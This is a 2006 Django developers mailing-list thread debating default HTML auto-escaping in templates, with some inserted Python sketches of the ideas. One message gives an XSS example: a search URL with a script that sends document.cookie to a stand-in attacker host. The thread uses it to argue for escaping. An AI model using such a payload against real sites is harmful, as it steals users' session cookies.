Proposal: default escaping


SmileyChris

Jun 13, 2006, 6:49:15 PM
to Django developers
Here's how I see it:
- 99% of the time, templates are HTML
- most template variables should be escaped
- developers are human and will miss variables that need escaping

My proposal is that all template variables are escaped by default.


Think about it for a bit before you throw the idea away. Then reply
with your thoughts.


Of course we need an easy method to NOT auto-escape variables. Perhaps
something like {{{{ raw_variable }}}}?

There is also the issue of MASSIVE backwards incompatibility. The two
options I see are:
1. A new variable type is created for auto-escaping instead
2. Provide a setting which turns this new functionality on but is off
by default

Rudolph

Jun 13, 2006, 7:07:27 PM
to Django developers
Hi,

Pro:
- secure by default: you do not miss one variable because you have to
explicitly disable it for a variable, I would prefer a little more
verbose syntax like: {{ variable|noescape }}.

Con:
- explicit escaping is better than implicit escaping (no magic behind
the scenes)

I like your idea of explicitly turning it on or off globally in the
settings. In addition to that idea I would suggest an option to set the
behaviour for a whole Template, something like:

tmpl = loader.get_template('example.csv')
tmpl.auto_escape = False
tmpl.render(context)

You could also skip the idea of globally enabled escaping, and only do
it per template as described above. I'm not sure what I like the most.

Rudolph

Michael Radziej

Jun 14, 2006, 3:00:46 AM
to django-d...@googlegroups.com
Hi,

Some time ago, I wrote something in this direction, it's a Template
subclass that escapes all variable nodes. I found that I don't use
it, but perhaps someone wants to build upon it. It works, but misses
a proper loader.

If you have a pre-formatted string, you have to turn it into an
HtmlEscapedString when putting it into the Context.

It's attached.

Michael

htmltemplate.py

Simon Willison

Jun 14, 2006, 4:57:46 AM
to django-d...@googlegroups.com

On 14 Jun 2006, at 00:07, Rudolph wrote:

> I like your idea of explicitly turning it on or off globally in the
> settings. In addition to that idea I would suggest an option to set the
> behaviour for a whole Template, something like:
>
> tmpl = loader.get_template('example.csv')
> tmpl.auto_escape = False
> tmpl.render(context)

I'm not keen on either of those options. The template file itself is
the place where the assumption of escaping vs. not-escaping matters.
Example: I write a template that expects auto escaping to be on:

<p>Hello, {{ name_from_form }}</p>

My assumption that escaping is turned on is built in to the template
file itself. If I hand it off to a friend and they deploy it
somewhere without realising that their settings file should have
AUTO_ESCAPE=True, they have an XSS hole. Alternatively, if they load
my template and set tmpl.auto_escape=False they have a hole as well.

Furthermore, setting auto escaping globally destroys all chances of
code reusability. What if I download a forum application from
somewhere and a poll application from somewhere else, and one of them
expects the global AUTO_ESCAPE option to be true while the other
expects it to be false? This is /exactly/ what happened with the
whole magic quotes thing in PHP and it made writing reusable PHP
components virtually impossible.

In my opinion, there are three viable solutions:

1. auto_escape is on for ALL Django templates ALL the time. It may
well be too late to do this due to backwards compatibility concerns.

2. auto_escape is controlled in the Django template file itself. The
above example might become something like this:

{% auto_escape_on %} <!-- global setting for this template -->
<p>Hello, {{ name_from_form }}</p>

Or maybe a block-style template tag:

{% autoescape %}
<p>Hello, {{ name_from_form }}</p>
{% endautoescape %}

While the second seems to fit better with previous template tags, I
actually prefer the first. It reminds me of Python's method for
stating that a .py source file is written in UTF-8:

# -*- coding: utf-8 -*-

3. Auto escape based on the file extension for the template -
"frontpage.html" gets auto escaped, "welcome_email.txt" doesn't. I'm
not sure how I feel about this option.
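
Option 3 is simple enough to sketch in a few lines. This is only an illustration in present-day Python; the function name and the set of extensions are assumptions, not anything Django provides:

```python
import os.path

# Hypothetical choice of extensions whose templates get HTML auto-escaping.
AUTOESCAPE_EXTENSIONS = {".html", ".htm", ".xml"}


def should_autoescape(template_name):
    """Return True if the template's file extension suggests HTML-like output."""
    _, ext = os.path.splitext(template_name)
    return ext.lower() in AUTOESCAPE_EXTENSIONS
```

With this rule "frontpage.html" would be auto escaped and "welcome_email.txt" would not, and the decision travels with the template file rather than with a settings file.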

The ideal situation would be for auto_escape to be on by default, and
let templates turn it off if they need to. This has serious backwards
compatibility issues however.

Naturally, an "unescape" filter should be included so that even when
auto escaping is on you can still undo it on a per-variable basis if
you need to.

Cheers,

Simon

Gábor Farkas

Jun 14, 2006, 5:48:32 AM
to django-d...@googlegroups.com
Simon Willison wrote:
>
>
> The ideal situation would be for auto_escape to be on by default, and
> let templates turn it off if they need to. This has serious backwards
> compatibility issues however.

the official opinion is that there's no backward-compatibility
guarantees before 1.0 anyway...

i understand that it would be nice not to break backward compatibility,
but escaping is imho such a serious issue, that imho it would make
sense, even if it causes backward-incompatibility.

and, if we'll have a template tag, like "{% auto_escape_off %}", then if
you do not want to break your older templates, simply add this line to
all of them, and everything will be like before. clean and simple.

gabor

Deryck Hodge

Jun 14, 2006, 8:26:33 AM
to django-d...@googlegroups.com
Hi, all. <imitates_radio>First time caller here.</imitates_radio>

On 6/14/06, Simon Willison <swil...@gmail.com> wrote:
> In my opinion, there are three viable solutions:
>
> 1. auto_escape is on for ALL Django templates ALL the time. It may
> well be too late to do this due to backwards compatibility concerns.
>

Another concern about this option, beyond just backwards compatibility,
is that Django would be making assumptions about what I want to do with
my data. I don't agree with the assumption in the parent that "most template
variables should be escaped". Probably they should, but that's a debatable
point, not a fact.

One of the things I love most about Django is that it doesn't make
assumptions about what I want to do, at least not assumptions of this kind.
It just gives me tools for doing what I want more efficiently.

> 2. auto_escape is controlled in the Django template file itself. The
> above example might become something like this:

I think this is better. Then it's still my choice, but I'm capable of
applying escaping more quickly and easily. It's about efficiency again. :-)

Cheers,
deryck

--
Deryck Hodge
http://www.devurandom.org/
http://www.samba.org/

"Aimless days, uncool ways of decathecting" --Mike Doughty (2005)

Derek Anderson

Jun 14, 2006, 9:44:47 AM
to django-d...@googlegroups.com
the problem is that there are multiple types of escaping. sql? html?
javascript? new-web-tech-of-the-day? do you escape them all, or just some?
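
The point about multiple kinds of escaping is easy to see with Python's standard library. A small sketch in present-day Python (the sample value is made up): the same string needs a different encoding depending on where it ends up.

```python
import html
import json
from urllib.parse import quote

value = 'Tom & "Jerry" <b>'

# For HTML text content and quoted attribute values.
as_html = html.escape(value)

# For a single URL query component (safe="" also encodes "/").
as_url = quote(value, safe="")

# For a JavaScript/JSON string literal. Note that json.dumps does not
# escape "<" or ">", so this alone is not enough inside a <script> block.
as_js = json.dumps(value)
```

None of the three results is interchangeable with the others, which is why "escape everything" has to say which output format it means.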

personally, i don't like my framework to auto-munge my data behind my
back. esp. in ways that are not clearly defined and could change on a
whim. too many potential secondary effects. plus it stinks to me of a
false sense of security while implicitly OKing people to ignore security.

but if it is going to be done, i'd suggest a flag on the field in the
model. ("automunge-html":="true"?) with perhaps a model default.

Simon Willison

Jun 14, 2006, 10:20:29 AM
to django-d...@googlegroups.com
On 14 Jun 2006, at 14:44, Derek Anderson wrote:

> the problem is that there are multiple types of escaping. sql? html?
> javascript? new-web-tech-of-the-day? do you escape them all, or just some?
>
> personally, i don't like my framework to auto-munge my data behind my
> back. esp. in ways that are not clearly defined and could change on a
> whim. too many potential secondary effects. plus it stinks to me of a
> false sense of security while implicitly OKing people to ignore security.
>
> but if it is going to be done, i'd suggest a flag on the field in the
> model. ("automunge-html":="true"?) with perhaps a model default.

The model is definitely the wrong place for this - after all, a model
field might be output in a plain text email where escaping isn't
appropriate.

The problem here is very simple: XSS is the most common vulnerability
on the Web. It's unbelievably easy for an XSS vulnerability to sneak
in to an application - even experienced programmers who completely
understand the security implications are likely to forget to add a |
escape filter once in a while.

Obviously we DO need to be able to turn auto escaping off - there are
plenty of cases where it isn't appropriate. A classic example from
Django at the moment would be:

{{ value|markdown }}

We should also be able to turn it off for people who don't like it,
like yourself!

BUT... we can't have it as a global setting. magic quotes in PHP has
taught us that much - global settings relating to auto filtering of
data lead to insanity when you start wanting to create reusable
applications.

That's why I'm keen on having escaping set at the template level. I'm
actually starting to feel that using the template extension might not
be a bad idea here. "index.html" has auto escaping, "index.txt"
doesn't. That way templates don't have to include an ugly extra tag
at the top of the code.

Cheers,

Simon

Derek Anderson

Jun 14, 2006, 10:48:16 AM
to django-d...@googlegroups.com
the idea of it being in the model was more along the lines of validating
incoming data than it was munging outgoing. html is almost always
either acceptable or it's not in a given field. (per your example: who
wants arbitrary HTML allowed in a plain text email and not in a web
page?)

but i still argue that no implicit magic munging should happen anywhere. it's
not that hard to get into safe-from-XSS coding styles. we did it for
sql injection, didn't we? :)

however, i would much rather have a flag/tag at the top of my template
than a global default based on template file type.

Deryck Hodge

Jun 14, 2006, 11:00:45 AM
to django-d...@googlegroups.com
On 6/14/06, Derek Anderson <pub...@kered.org> wrote:
>
> the idea of it being in the model was more along the lines of validating
> incoming data than it was munging outgoing. html is almost always
> either acceptable or it's not in a given field. (per your example: who
> wants arbitrary HTML allowed in a plain text email and not in a web
> page?)
>
> but i still argue that no implicit magic munging should happen anywhere. it's
> not that hard to get into safe-from-XSS coding styles. we did it for
> sql injection, didn't we? :)
>

I agree with Simon that if this should happen it shouldn't be at the
model level, but I'm really in agreement with Derek on the larger issue
here that this shouldn't be turned on by default. It smells to me of
a false sense of security.

And really, if it's done at the template level, you'll still have to decide
when to turn on/off, so why change the default? I just like the idea of
adding a {% autoescape %} or something similar much better.

Just my .02...

Simon Willison

Jun 14, 2006, 11:13:16 AM
to django-d...@googlegroups.com

On 14 Jun 2006, at 15:48, Derek Anderson wrote:

> the idea of it being in the model was more along the lines of validating
> incoming data than it was munging outgoing. html is almost always
> either acceptable or it's not in a given field. (per your example: who
> wants arbitrary HTML allowed in a plain text email and not in a web
> page?)
>
> but i still argue that no implicit magic munging should happen anywhere. it's
> not that hard to get into safe-from-XSS coding styles. we did it for
> sql injection, didn't we? :)

It's not just about data from models though. The absolutely classic
XSS example is the search feature that redisplays the query:

blah.com/search?q=django

You searched for {{ q }}:

{% for result in searchresults %}
...
{% endfor %}

blah.com/search?q=<script>window.location='http://hax.ru/?steal='+document.cookie</script>

XSS hole!
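
The difference between the two outcomes can be shown outside the template system with Python's standard library. This is just a sketch of what the |escape filter buys you, using plain string formatting in place of a real template:

```python
import html

# The malicious query string from the example above.
query = "<script>window.location='http://hax.ru/?steal='+document.cookie</script>"

# Without escaping, the script tag reaches the browser intact.
unsafe = "You searched for %s:" % query

# With escaping, the markup is rendered as inert text.
safe = "You searched for %s:" % html.escape(query)
```

In the escaped version the angle brackets arrive as &lt; and &gt;, so the browser displays the query instead of running it.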

What do you think of auto escaping being on for .html templates and
off for .txt templates?

Cheers,

Simon

Michael Radziej

Jun 14, 2006, 11:19:56 AM
to django-d...@googlegroups.com
Hmm. I see two different cases that get munched in the discussion:

a) You run data through some filter or inside a html tag where it shouldn't be escaped.
For this, you (or the designer) need to specify this in the template.

b) Parts of the context are pre-assembled html or are already escaped. The designer can't
always know when this is the case.
To cope with this, I really like the approach of Ian Bicking's Quixote:
Everything that has already been escaped is packaged in a wrapper class,
so that you pass something like
HtmlEscaped('<a href="..">bla</a>')
into the context.
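
A rough sketch of that wrapper idea in present-day Python. The class name follows the example above; render_value is a hypothetical helper standing in for whatever the template engine does when it outputs a variable:

```python
import html


class HtmlEscaped(str):
    """Marker type: the wrapped text is already safe to emit as HTML."""


def render_value(value):
    """Escape plain values; pass HtmlEscaped values through untouched."""
    if isinstance(value, HtmlEscaped):
        return value
    return HtmlEscaped(html.escape(str(value)))
```

The view code decides what is pre-assembled HTML by wrapping it, and the template author writes {{ var }} in both cases.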

Michael

oggie rob

Jun 14, 2006, 12:19:20 PM
to Django developers
> What do you think of auto escaping being on for .html templates and off for .txt templates?

Simon,
Sounds clean but consider:
a) The ever-present argument about file extensions & template syntax
(that we seemed to solve with MR)
b) These can't be so easily extended. For example, to switch your
entire app from non-escaping to escaping you have to rename all your
files. If you set a variable in a base template, you can just add the
tag there.
So I think {% auto_escape_on %} or {% auto_escape_off %} are better
options (depending on consensus to which should be the default).

-rob

Simon Willison

Jun 14, 2006, 12:51:28 PM
to django-d...@googlegroups.com

On 14 Jun 2006, at 17:19, oggie rob wrote:

> a) The ever-present argument about file extensions & template syntax
> (that we seemed to solve with MR)
> b) These can't be so easily extended. For example, to switch your
> entire app from non-escaping to escaping you have to rename all your
> files. If you set a variable in a base template, you can just add the
> tag there.
> So I think {% auto_escape_on %} or {% auto_escape_off %} are better
> options (depending on consensus to which should be the default).

You've got me convinced. In that case, my preference is probably for
auto escape to be on by default, and for it to be turn on-and-offable
with {% autoescape on %} and {% autoescape off %}.

Deryck Hodge

Jun 14, 2006, 1:02:51 PM
to django-d...@googlegroups.com
On 6/14/06, Simon Willison <swil...@gmail.com> wrote:
>

My preference would be off by default with the same on-and-offable
tags listed here. I'd rather make the conscious choice to escape rather
than unescape. And you're still backwards compatible at that point.

But I can live with on by default, too. :-)

Rudolph

Jun 14, 2006, 1:48:54 PM
to Django developers
Hi,

Derek Anderson mentioned the need for different kinds of escaping. So
maybe the syntax should be more something like:

{% autoescape xml on %}

and

{% autoescape javascript on %}

Rudolph

Jacob Kaplan-Moss

Jun 14, 2006, 3:08:11 PM
to django-d...@googlegroups.com
Hi folks --

So the benefits of automatic escaping are pretty obvious --
protection from XSS attacks -- but I'm wary of a few details in the
existing proposals.

First, escaping everything by default completely breaks every existing
template. That's not necessarily a complete deal-breaker, but I'm
pretty much -1 on the idea as it seems too radical.

I like the proposal by Simon (et al) for an {% autoescape on %} tag.
However, there are some semantics of the tag that are scary. Not
doing it as a block tag means that simply by calling the tag I've
switched the template language into a different system. That has non-
obvious implications when used with extension/inclusion. For example::

base.html:

{% autoescape on %}
{% block content %}{% endblock %}

child.html:

{% extends "base.html" %}
{% block content %}{{ var }}{% endblock %}

How does {{ var }} behave in the child template?

And for content brought in through {% include %}?

Sure, answers to these questions can be documented, but I still think
they'd be non-obvious. Because of that, I'm -0 on this concept
without further exploration.

Given that, I think the best idea is still using a block tag::

{% escape %}
{{ var }}
{% endescape %}

that just seems the most clear to me.
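
One way to see why the block form has clearer semantics is to model it as scoped state that is always restored on exit. The sketch below is an assumption-laden illustration in present-day Python (RenderState and its methods are hypothetical, and escaping is off by default here); it does not settle the extension/inclusion questions above:

```python
import html
from contextlib import contextmanager


class RenderState:
    """Tracks whether variables are escaped at the current point of rendering."""

    def __init__(self):
        self.escape_stack = [False]  # escaping is off by default in this sketch

    @property
    def escaping(self):
        return self.escape_stack[-1]

    @contextmanager
    def escape_block(self, on=True):
        """Model of {% escape %} ... {% endescape %}: push on entry, pop on exit."""
        self.escape_stack.append(on)
        try:
            yield
        finally:
            self.escape_stack.pop()

    def render_var(self, value):
        text = str(value)
        return html.escape(text) if self.escaping else text


state = RenderState()
before = state.render_var("<b>")
with state.escape_block():
    inside = state.render_var("<b>")
after = state.render_var("<b>")
```

The setting only applies between the opening and closing tag, so nothing outside the block changes behaviour.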

Jacob

gabor

Jun 14, 2006, 4:04:29 PM
to django-d...@googlegroups.com
Jacob Kaplan-Moss wrote:
> Hi folks --
>
> So the benefits of automatic escaping are pretty obvious --
> protection from XSS attacks -- but I'm wary of a few details in the
> existing proposals.
>
> <snip/>

i completely agree that before doing such a global change, all
consequences will have to be examined/specified.


>
> Given that, I think the best idea is still using a block tag::
>
> {% escape %}
> {{ var }}
> {% endescape %}
>
> that just seems the most clear to me.

maybe we could try to answer a question:

is it true, that people usually forget to escape dangerous variables?


a) if no (people do not forget):
means people are already using 'escape' when needed. in this case, this
block-level tag is a welcome addition, because it makes it
simpler/more-convenient to toggle escaping.


b) if yes (people do forget):
a block level tag will not help. people will forget to use them the same
way they forget to use the 'escape' filter.

my guess is (b)

gabor

SmileyChris

Jun 15, 2006, 12:19:33 AM
to Django developers
gabor wrote:
> my guess is (b)

I think (b) is pretty much a given. Looking back in the developers
group history, I see this is a recurring problem that seems to keep
getting put in the "too hard" basket.

See:
http://groups.google.com/group/django-users/browse_thread/thread/21da889ecb9c63dd/145e3e9c0e39b310
which references:
http://groups.google.com/group/django-users/browse_thread/thread/13cf8218d3a18aad/f4648b081c90885a
http://groups.google.com/group/django-developers/browse_thread/thread/e448bbdd40426915/2ee9766d0d148706

Gary Wilson

Jun 15, 2006, 1:55:44 PM
to Django developers
gabor wrote:
> is it true, that people usually forget to escape dangerous variables?
>
>
> a) if no (people do not forget):
> means people are already using 'escape' when needed. in this case, this
> block-level tag is a welcome addition, because it makes it
> simpler/more-convenient to toggle escaping.
>
>
> b) if yes (people do forget):
> a block level tag will not help. people will forget to use them the same
> way they forget to use the 'escape' filter.
>
> my guess is (b)

or

c) people don't know what XSS is and are clueless about the need to
escape. A good case for turning escaping on by default.


What would you rather have:
"Help, help! How do I turn off escaping?"
or
"Help, help! H4a0r s+0l3|> my Dj4|\|g0!!!!!!!!111"

James Bennett

Jun 15, 2006, 2:15:41 PM
to django-d...@googlegroups.com
On 6/15/06, Gary Wilson <gary....@gmail.com> wrote:
> What would you rather have:
> "Help, help! How do I turn off escaping?"

I don't know... memories are stirring of my PHP days and the horror of
magic_quotes...


--
"May the forces of evil become confused on the way to your house."
-- George Carlin

Norman Harman

Jun 15, 2006, 2:37:33 PM
to django-d...@googlegroups.com
For my ImageUploadFields I ignore the filename provided by the user and
name the file something specific. I got real tired of the save_file
method appending underscores when it found a file with that name
already existed.

So, added this delete_fieldname_file(). Works like save_filename_file
but deletes any file named get_fieldname_file.

Maybe someone else likes it. It should be added to mr.

patch attached, I hope...

delme

Rowan Kerr

Jun 15, 2006, 6:44:04 PM
to django-d...@googlegroups.com
On 6/15/06, James Bennett <ubern...@gmail.com> wrote:
> I don't know... memories are stirring of my PHP days and the horror of
> magic_quotes...

As long as the data is only escaped on final output (and here escaping
should actually be intelligent as to whether it's outputting html, or
some mime-encoded email). magic_quotes mangled all your data no matter
where it was from or where it was going.

-Rowan

Phil Powell

Jun 16, 2006, 9:17:14 AM
to django-d...@googlegroups.com
On 14/06/06, oggie rob <oz.rob...@gmail.com> wrote:
> So I think {% auto_escape_on %} or {% auto_escape_off %} are better
> options (depending on consensus to which should be the default).

I'm kind of +1 for leaving it off by default - I'm not keen on data
getting munged behind my back.

And as for the argument that people will forget to use it - I have the
hard-line opinion of: tough, you should be more careful. If it
forcibly makes developers more aware of the possibilities of XSS et
al, then that can only be a good thing.

Just to throw something else into the mix: how about a HTMLField?

-Phil

Christopher Lenz

Jun 16, 2006, 12:17:35 PM
to django-d...@googlegroups.com
Am 14.06.2006 um 21:08 schrieb Jacob Kaplan-Moss:
[snip]

> Given that, I think the best idea is still using a block tag::
>
> {% escape %}
> {{ var }}
> {% endescape %}

I feel this is inelegant and insufficient. Back when this topic was
raised last time, I chimed in with a reference to how we handle
HTML escaping in Trac:

http://groups.google.com/group/django-developers/browse_thread/thread/e448bbdd40426915/9962020f9699471c?q=lenz&rnum=8#9962020f9699471c

To reiterate: templates shouldn't need to care about escaping. Django
*in particular* uses an intentionally dumbed down template system
that is supposed to be easy for non-programmers, which includes the
notion that little mistakes in templates shouldn't break the site or
even introduce security holes.

IMHO, a real solution for this problem is that any normal string
inserted into template output is escaped by default. This does not
necessarily mean that there needs to be an unescape filter, though.
In fact, most of the time, Django components that generate a string
*know* that they are generating text that must not be escaped,
such as the output of the markdown filter, or form field render()
results. Those places should flag the strings they are generating in
some way (for example by wrapping them in a special class), thereby
signaling to the template system that those strings should not be
escaped again.

Now, I'll admit that the Django template engine being output-type
agnostic is a problem in this context. But then again, I'm not happy
with Django templating in general, so I'll just shut up now :-P

Cheers,
Chris
--
Christopher Lenz
cmlenz at gmx.de
http://www.cmlenz.net/

SmileyChris

Jun 18, 2006, 12:54:22 AM
to Django developers
Brilliant, Christopher. This is exactly the solution I'd be pleased
with!

We still have the problem of invalidating every single template written
so far in Django, however...

James Bennett

Jun 18, 2006, 2:54:25 AM
to django-d...@googlegroups.com
On 6/16/06, Christopher Lenz <cml...@gmx.de> wrote:
> To reiterate: templates shouldn't need to care about escaping. Django
> *in particular* uses an intentionally dumbed down template system
> that is supposed to be easy for non-programmers, which includes the
> notion that little mistakes in templates shouldn't break the site or
> even introduce security holes.

The problem here, architecture-wise, is that the template is the thing
that cares about what output looks like. Moving the decision of
whether to escape or not into some other part of the stack breaks with
that and introduces the possibility of frustrating inconsistency in
the templating system; explaining to a template author why {{ foo }}
escapes in one case but not another, based on (to the template author)
black magic happening in the backend isn't something I particularly
want to do.


> IMHO, a real solution for this problem is that any normal string
> inserted into template output is escaped by default. This does not
> necessarily mean that there needs to be an unescape filter, though.

Yes. Yes, it does.

> In fact, most of the time, Django components that generate a string
> *know* that they are generating text that must not be escaped,
> such as the output of the markdown filter, or form field render()
> results. Those places should flag the strings they are generating in
> some way (for example by wrapping them in a special class), thereby
> signaling to the template system that those strings should not be
> escaped again.

As someone who's followed various RSS-related discussions for a long
time, I can say that having multiple layers of a system have to worry
about whether the other layers have escaped or unescaped something is
a very special kind of hell that I don't want Django to get mired in.

But beyond that, it feels like a violation of loose coupling; doing
this would bind Django components to each other in ways that don't
feel right.

My vote is for escaping being off unless explicitly turned on, and for
it being turned on in the template.

pub...@kered.org

Jun 19, 2006, 3:18:13 PM
to django-d...@googlegroups.com
To better detail the "in the model" idea:

An additional field type would be added, extending CharField, called say
"HTMLSafeField". It would strip/escape/convert/reject invalid strings
both when being set and when being read. Otherwise it would behave just
like a CharField.
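
As a rough illustration of the "reject" variant of this idea, here is a sketch in present-day Python using a plain descriptor rather than a real Django field. HTMLSafeValue, the Comment class and the choice of rejected characters are all assumptions made for the example:

```python
import re

# Assumption for this sketch: a value is "unsafe" if it contains any of < > & " '
_UNSAFE = re.compile(r"[<>&\"']")


class HTMLSafeValue:
    """Descriptor that rejects strings containing HTML-significant characters."""

    def __set_name__(self, owner, name):
        self.attr = "_" + name

    def __get__(self, obj, objtype=None):
        if obj is None:
            return self
        return getattr(obj, self.attr)

    def __set__(self, obj, value):
        # Validate on assignment, the way a model field validator would.
        if _UNSAFE.search(value):
            raise ValueError("HTML-significant characters are not allowed")
        setattr(obj, self.attr, value)


class Comment:
    body = HTMLSafeValue()

    def __init__(self, body):
        self.body = body
```

Comment("hello") is accepted, while Comment("<script>") raises ValueError, so the check happens when data enters the model rather than when it is rendered.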

The key is not to think of it as an escaping mechanism; simply as a data
validity check. And there is ample precedent for this in Django. What
are EmailFields, PhoneNumberFields and SlugFields if not simply CharFields
that match a regex?

"Intro" users who are not able to grok XSS can simply be told to always
use HTMLSafeFields instead of CharFields. Converting existing apps would
be simple model-only search-and-replace exercises. Folks who don't like
wrapper tags around all variables in templates will be appeased. (as will
those who don't want "escape=on" tags at the top of every template) And I
(and my like-minded kin) who think both "breaking every template==bad" and
"magic behind the scenes==worse" will not vomit at the addition.

Likewise XMLSafeField, JavascriptSafeField, MustMatchUserRegexField, etc.
would be logical extensions.

The biggest downside is if you want valid HTML data stored for one output
type and escaped for another. But this is not a scenario I've ever seen
in the real world, and regardless is easily worked around with simply
returning to CharFields for that one attribute. (and manually escaping of
course)

What do you think?

-- Derek

Simon Willison

Jun 19, 2006, 3:37:28 PM
to django-d...@googlegroups.com

On 19 Jun 2006, at 20:18, pub...@kered.org wrote:

> The biggest downside is if you want valid HTML data stored for one output
> type and escaped for another. But this is not a scenario I've ever seen
> in the real world, and regardless is easily worked around with simply
> returning to CharFields for that one attribute. (and manually escaping of
> course)
>
> What do you think?

I'm not keen on escaping being controlled by the model - escaping
should be a template-level decision as that's when you decide what
format is being output (plain text email / HTML / XML / LaTeX for PDF
conversion etc).

I played around with some proofs of concept over the weekend and I
think I have some ideas that should keep most people happy. I'll try
to write them up on the wiki this evening.

Cheers,

Simon

pub...@kered.org

Jun 19, 2006, 4:00:57 PM
to django-d...@googlegroups.com
> I'm not keen on escaping being controlled by the model - escaping
> should be a template-level decision as that's when you decide what
> format is being output (plain text email / HTML / XML / LaTeX for PDF
> conversion etc).
>
> I played around with some proofs of concept over the weekend and I
> think I have some ideas that should keep most people happy. I'll try
> to write them up on the wiki this evening.

that's why i suggest looking at this as a data validation issue. (not
simply as escaping) we do lots of validation in the model already. (some
argue that *all* data validation should be in the model) this would just
be an additional type.

anyway, i suppose i will wait for you to elaborate on your reasoning in
the wiki this evening. :)

SmileyChris

Jun 19, 2006, 11:42:39 PM
to Django developers
pub...@kered.org wrote:

> that's why i suggest looking at this as a data validation issue. (not
> simply as escaping) we do lots of validation in the model already.

But it is an escaping issue.
There's nothing wrong with allowing html to be entered in (for example)
a comment field. It should be escaped in most templates, but sometimes
not, for example if there was a plain-text email of comments that gets
sent.

Simon Willison

Jun 20, 2006, 2:50:41 AM
to django-d...@googlegroups.com

On 19 Jun 2006, at 21:00, pub...@kered.org wrote:

> anyway, i suppose i will wait for you to elaborate on your reasoning in
> the wiki this evening. :)

I've written up a proposal for how we can implement auto escaping
while hopefully keeping most people happy:

http://code.djangoproject.com/wiki/AutoEscaping

It incorporates stuff from a whole bunch of prior discussions. In my
opinion the most important aspect is the use of special escapedstr
and escapedunicode subclasses to mark a string as having been already
escaped, meaning that the auto escaping mechanism knows if it should
kick in to action or not. This should also avoid double escaping, and
allow a decent level of finely grained control over the escaping
mechanism.
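
To give a feel for the marker-subclass idea, here is a minimal sketch in present-day Python. Only the name escapedstr comes from the proposal; the escape, bold and output functions are hypothetical stand-ins, and the wiki page may well differ in the details:

```python
import html


class escapedstr(str):
    """A str subclass marking text that has already been HTML-escaped."""


def escape(value):
    """Escape once: strings already marked as escaped are returned unchanged."""
    if isinstance(value, escapedstr):
        return value
    return escapedstr(html.escape(str(value)))


def bold(value):
    """Hypothetical markup-producing filter: escapes its input, marks its output."""
    return escapedstr("<b>%s</b>" % escape(value))


def output(value):
    """What an auto-escaping variable node might do at render time."""
    return str(escape(value))
```

Here output("a < b") and output(escape("a < b")) give the same result, so there is no double escaping, and output(bold("a < b")) keeps the <b> tags while still escaping the user's text. One caveat with this sketch: ordinary string operations such as concatenation return a plain str, so the marker is lost unless the subclass overrides them.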

I'd like to get a branch going to explore this stuff properly. From
messing around with my own local code it seems like it should all
work, but there's a bunch of work that needs to be done to make
existing Django filters and templates auto escape compliant.

Cheers,

Simon

Michael Radziej

Jun 20, 2006, 4:34:45 AM
to django-d...@googlegroups.com
Simon Willison wrote:
> I've written up a proposal for how we can implement auto escaping
> while hopefully keeping most people happy:
>
> http://code.djangoproject.com/wiki/AutoEscaping

GoodStuff! (tm)

Michael

adurdin

Jun 20, 2006, 5:50:07 AM
to Django developers
Simon Willison wrote:
> I've written up a proposal for how we can implement auto escaping
> while hopefully keeping most people happy:
>
> http://code.djangoproject.com/wiki/AutoEscaping

A very nice solution, with a good method of automatically flagging
things as escaped or not; but it seems to me more complicated than is
needed. And, of course there's more than just html escaping needed;
URLs should be escaped differently, and other values intended to be
used as attributes also need a different escape filter -- I'm not sure
your proposal will allow these to be handled correctly and
conveniently. So here's another idea to throw into the soup:

Having the context aware of the primary escaping needs of the output is
a nice idea, but as James Bennett pointed out, the template is what
should be making the decision. Suppose the template renderer had a
"default filter" that would get applied to all otherwise unfiltered
output? Obviously, the default value for this would be
django.template.defaultfilters.escape -- but it could be set to
another filter for JSON output, or to None for plain text. One
possible mechanism for doing this would be a {% default_filter ... %}
tag in the template...?

Assuming the default, then {{name}} would be the equivalent of
{{name|escape}}, whereas <a href="{{myurl|urlencode}}"> would remain
unchanged, and a new filter "raw" (just a pass-thru) could be used for
situations like <script>{{myscript|raw}}</script>.

The main drawback I see with this is that the behaviour of
{{mylist|count}} is not obviously unescaped. Perhaps having all output
piped through the default filter unless it is piped through the "raw"
filter (which could perhaps be handled using Michael's escaped
strings)?
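A minimal sketch of the "default filter" idea, in plain Python rather than Django's template engine. The names `render_variable` and `raw` are hypothetical and only illustrate the rule described above: output with no explicit filter gets the default filter, and anything explicitly filtered is left alone.

```python
from html import escape


def raw(value):
    """Pass-through filter: opts a variable out of the default filter."""
    return value


def render_variable(value, filters=(), default_filter=escape):
    """Render one variable (hypothetical helper, not Django's API).

    If no explicit filters were given, apply the template-wide default
    filter; pass default_filter=None for plain-text output.
    """
    if not filters:
        text = str(value)
        return default_filter(text) if default_filter else text
    # Explicitly filtered output bypasses the default filter entirely.
    for f in filters:
        value = f(value)
    return str(value)


plain = render_variable("<b>Bob</b>")                    # like {{name}}
unfiltered = render_variable("<b>Bob</b>", [raw])        # like {{name|raw}}
shouted = render_variable("<b>bob</b>", [str.upper])     # any other filter
```

The last call shows the drawback mentioned above: under this rule, any explicit filter (here `str.upper`) silently skips escaping, not just `raw`.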

Andrew

adurdin

Jun 20, 2006, 6:05:00 AM6/20/06
to Django developers
adurdin wrote:
>
> The main drawback I see with this is that the behaviour of
> {{mylist|count}} is not obviously unescaped.

I meant {{mylist|length}}, of course.

Todd O'Bryan

Jun 20, 2006, 7:02:33 AM6/20/06
to django-d...@googlegroups.com
Couldn't we do something less invasive/complicated?

How about

{{ var }}

by default escapes the contents (in other words, the very first
filter called on a variable is escape, by default) and

{{ var|raw }}

skips the call to escape?

It breaks backwards compatibility, but maybe there's a way to avoid
that with a setting of some sort. (Say AUTO_ESCAPE=false in
settings.py for people who don't want the change.)

Todd

Todd O'Bryan

Jun 20, 2006, 7:05:50 AM6/20/06
to django-d...@googlegroups.com
Hey. We came up with this independently. It must be a good idea. :-)

Todd

Michael Radziej

Jun 20, 2006, 7:15:01 AM6/20/06
to django-d...@googlegroups.com
Hi,

I thought a little bit about your remarks and I think all your problems can be solved.

Perhaps it's also a good idea to add an attribute `raw` to the class `escaped`, so that
you can always access the raw string when it is necessary. In some circumstances, such
as when you pass a complete html table in the context, this could simply raise an error.

adurdin wrote:
> Simon Willison wrote:
>> I've written up a proposal for how we can implement auto escaping
>> while hopefully keeping most people happy:
>>
>> http://code.djangoproject.com/wiki/AutoEscaping
>
> A very nice solution, with a good method of automatically flagging
> things as escaped or not; but it seems to me more complicated than is
> needed. And, of course there's more than just html escaping needed;
> URLs should be escaped differently, and other values intended to be
> used as attributes also need a different escape filter -- I'm not sure
> your proposal will allow these to be handled correctly and
> conveniently.

Well then ... one thing after the other, and first things first ;-)

You could simply encode the URL, as you currently need to do anyway, and then mark it as escaped.
Or, there could be a separate class, similar to `escaped` from Simon's proposal, that would mark
